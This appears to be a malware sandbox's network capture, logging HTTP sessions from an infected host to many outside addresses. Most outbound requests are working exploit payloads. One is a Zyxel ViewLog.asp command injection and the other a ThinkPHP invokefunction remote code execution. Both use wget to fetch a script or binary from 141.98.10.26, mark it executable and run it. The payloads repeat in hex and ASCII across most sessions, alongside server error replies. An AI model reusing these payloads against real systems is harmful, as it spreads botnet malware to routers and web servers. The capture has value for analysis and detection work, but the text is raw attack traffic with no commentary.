Nov 22, 2023 08:39:30.759279966 CET	12264	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:30.952425003 CET	12278	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=utf-8 server: Rocket permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), battery=(), camera=(), display-capture=(), document-domain=(), encrypted-media=(), execution-while-not-rendered=(), execution-while-out-of-viewport=(), fullscreen=(), geolocation=(), gyroscope=(), keyboard-map=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), screen-wake-lock=(), sync-xhr=(), usb=(), web-share=(), xr-spatial-tracking=() x-content-type-options: nosniff x-frame-options: SAMEORIGIN referrer-policy: same-origin x-xss-protection: 0 content-security-policy: default-src 'self'; base-uri 'self'; form-action 'self'; object-src 'self' blob:; script-src 'self' 'wasm-unsafe-eval'; style-src 'self' 'unsafe-inline'; child-src 'self' https://.duosecurity.com https://.duofederal.com; frame-src 'self' https://.duosecurity.com https://.duofederal.com; frame-ancestors 'self' chrome-extension://nngceckbapebfimnlniiiahkandclblb chrome-extension://jbkfoedolllekgbhcbcoahefnbanhhlh moz-extension://* ; img-src 'self' data: https://haveibeenpwned.com ; connect-src 'self' https://api.pwnedpasswords.com https://api.2fa.directory https://app.simplelogin.io/api/ https://app. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
616	192.168.2.23	52514	94.70.243.102	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:30.787389994 CET	12265	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:31.013485909 CET	12283	IN	HTTP/1.0 404 Not Found Date: Wed, 22 Nov 2023 07:14:01 GMT Server: Boa/0.94.13 Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
617	192.168.2.23	45908	31.136.168.224	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:31.135649920 CET	12285	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:31.717689991 CET	12387	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:32.837480068 CET	12508	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:35.173167944 CET	12753	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:39.780505896 CET	13305	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:48.739350080 CET	14367	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:06.912691116 CET	16558	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:43.771775007 CET	19767	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
618	192.168.2.23	60752	94.122.4.73	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:31.250220060 CET	12347	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
619	192.168.2.23	51666	94.120.61.57	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:31.250274897 CET	12348	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
620	192.168.2.23	52810	94.120.171.74	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:31.250329018 CET	12348	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
621	192.168.2.23	40202	62.29.48.200	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:31.250354052 CET	12349	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
622	192.168.2.23	41490	94.121.22.148	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:32.558410883 CET	12491	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
623	192.168.2.23	33172	94.122.203.139	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:32.566184044 CET	12492	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
624	192.168.2.23	43602	94.35.127.195	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:32.767762899 CET	12504	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:33.026771069 CET	12521	IN	HTTP/1.1 403 Forbidden

Session ID	Source IP	Source Port	Destination IP	Destination Port
625	192.168.2.23	54924	88.79.243.17	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:32.788652897 CET	12505	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
626	192.168.2.23	48550	88.99.127.58	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:32.796793938 CET	12506	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:32.986932039 CET	12520	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:39:32 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
627	192.168.2.23	60746	88.221.11.130	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:32.813745022 CET	12507	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:33.020797014 CET	12521	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 256 Expires: Wed, 22 Nov 2023 07:39:32 GMT Date: Wed, 22 Nov 2023 07:39:32 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 61 35 61 33 33 62 38 26 23 34 36 3b 31 37 30 30 36 33 38 37 37 32 26 23 34 36 3b 35 37 38 34 30 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.8a5a33b8.1700638772.578404</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
628	192.168.2.23	34596	88.87.10.67	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:32.823482990 CET	12507	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:36.107970953 CET	12883	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Nov 2023 07:39:32 GMT Server: Apache/2.4.6 (CentOS) mod_fcgid/2.3.9 PHP/5.4.16 Content-Length: 211 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 69 6e 64 65 78 2e 70 68 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /index.phpon this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
629	192.168.2.23	58440	112.126.158.127	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:33.292304039 CET	12535	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:33.602552891 CET	12560	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:36:31 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
630	192.168.2.23	54328	88.96.238.190	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:34.778251886 CET	12678	IN	Data Raw: 28 52 65 66 2e 49 64 3a 20 3f 73 4b 66 59 52 73 43 34 4d 34 61 32 57 38 50 61 43 34 7a 46 3f 29 Data Ascii: (Ref.Id: ?sKfYRsC4M4a2W8PaC4zF?)

Session ID	Source IP	Source Port	Destination IP	Destination Port
631	192.168.2.23	40566	112.3.25.43	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:34.996356010 CET	12710	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:35.392868042 CET	12844	IN	HTTP/1.1 400 Bad Request Server: JSP3/2.0.14 Date: Wed, 22 Nov 2023 07:39:35 GMT Content-Type: text/html Content-Length: 156 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4a 53 50 33 2f 32 2e 30 2e 31 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>JSP3/2.0.14</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
632	192.168.2.23	40570	112.3.25.43	80

Timestamp	kBytes transferred	Direction	Data
